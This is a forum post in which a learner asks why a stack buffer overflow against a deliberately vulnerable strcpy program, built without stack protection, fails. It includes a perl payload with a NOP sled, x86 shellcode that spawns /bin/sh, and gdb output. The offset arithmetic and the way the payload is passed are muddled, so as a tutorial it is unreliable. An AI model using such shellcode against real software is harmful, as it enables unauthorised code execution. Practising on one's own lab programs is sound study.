SEG FAULT (core dumped)

hey /prog/ im trying to learn about buffer overflows, im running ubuntu. I was wondering whether i need to compile this simple program with any certain arguments and if i need to do anything to my OS because i've heard GNU/Linux OS come with buffer overflow protection by default.

I compiled the program like this

gcc -fno-stack-protector abo1.c -o abo1

Here's the program.


#include <string.h>

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
        return 0;
}

I've figured out how much garbage i need (I think).


buffer(256) - nops(150) = 106

buffer(106) - shellcode(43) = 63

buffer(63) + eip(4) = 67

garbage == 67

Exploit test code to find eip


perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'

unless i did my maths wrong i get this, instead of a seg fault, so the eip isnt overwritten.


$ gdb abo1 -q
(gdb) run perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'
Starting program: /home/test/abo1 perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'

Program exited with code 064.
(gdb)

ANY help would be appreciated, thanks.

so no one in /prog/ has any ideas?